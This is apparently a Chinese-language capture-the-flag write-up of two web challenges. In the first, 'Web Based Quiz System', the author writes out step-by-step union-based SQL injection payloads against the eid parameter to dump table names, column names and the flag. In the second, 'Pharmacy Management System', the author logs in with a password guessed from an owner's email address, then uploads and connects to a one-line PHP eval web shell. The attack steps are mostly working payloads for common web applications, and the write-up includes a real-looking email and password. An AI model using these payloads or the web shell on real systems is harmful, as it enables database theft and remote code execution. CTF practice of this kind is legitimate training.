Web Based Quiz System SQL注入
直接输入welcome.php不行,只能注册一个用户登录进去
登录发现是题目说的注入的url,发现url上p的参数变动是换页面,先尝试着判断注入点
发现无论是字符还是数字都没有异常的回显
再试试看点击mysql 的start
发现有新的参数,尝试对eid进行判断
welcome.php?q=quiz&step=2&eid=60377db362694'--+&n=1&t=34%27--+
有新回显说明存在注入点
'union select 1,2,3,4,5--+
'oreder by 5
发现列数为5
开始尝试脱库
'union select 1,2,3,4,database()--+
在第3位
'union select 1,2,database(),4,5--+
接下来就是各种爆
表名
eid=-5b141b8009cf0' union select 1,2,group_concat(table_name),4,5 from%20information_schema.tables where table_schema=database()--+
字段名
eid=-5b141b8009cf0' union select 1,2,group_concat(column_name),4,5 from%20information_schema.columns where table_name='flag'--+
爆flag
eid=-5b141b8009cf0' union select 1,2,group_concat(flag),4,5 from ctf.flag--+
Pharmacy Management System shell upload
一个登录界面,题目没有提示有注入所以这里应该是寻找用户邮箱和密码
整个网页只有下面有链接就点进去试试
随便点一个查看
在弹出的浮窗里正好就有邮箱,这个容易被忽略
后面就不知道怎么找密码了,看别的博主说这个是根据邮箱地址猜的
mayuri.infospace@gmail.com
发现社工名是密码
mayurik
登录成功!
通过一开始题目的提示寻找发现文件上传点
上传一句话shell
<?php eval($_POST['g']);
上传成功,右键复制图像链接使用蚁剑连接
连接成功,在主目录下发现flag